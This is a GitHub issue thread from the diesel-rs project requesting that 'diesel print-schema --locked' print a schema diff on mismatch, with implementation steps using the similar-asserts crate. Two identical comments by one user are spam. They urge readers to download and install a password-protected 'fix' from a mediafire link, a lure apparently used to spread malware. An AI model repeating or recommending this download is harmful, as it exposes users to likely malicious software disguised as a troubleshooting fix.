### ISSUE TITLE
Print a diff if `diesel print-schema --locked` fails due to a mismatch

### ISSUE THREAD

**Issue by weiznich** [diesel-rs/diesel#4208]
We want to improve the user experience of diesel-cli. The `diesel print-schema` command provides a `--locked` schema flag that allows users to check if there `schema.rs` file is up to data. It's designed to be used in CI setups. It currently only provides the feedback that the schema file would change, but there is no output what exactly would change. To improve the user experience there we would like to print a diff between the current version of the schema stored in the `schema.rs` file and what `schema.rs` file would be constructed from the database.

The relevant comparison code is here: https://github.com/diesel-rs/diesel/blob/09d5e1050a40d698b10af98bd10495c98ccfaa7f/diesel_cli/src/main.rs#L284-L288

Implementing this feature should be as simple as:

1. Add a dependency on [similar-assert](https://docs.rs/similar-asserts/latest/) to the `Cargo.toml` file of `diesel-cli`
2. Construct a instance of [`similar_assert::SimpleDiff`](https://docs.rs/similar-asserts/latest/similar_asserts/struct.SimpleDiff.html) from the old and new version of the schema
3. Print the diff via `println!`

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aznszn** [comment]
id like to have a go at this
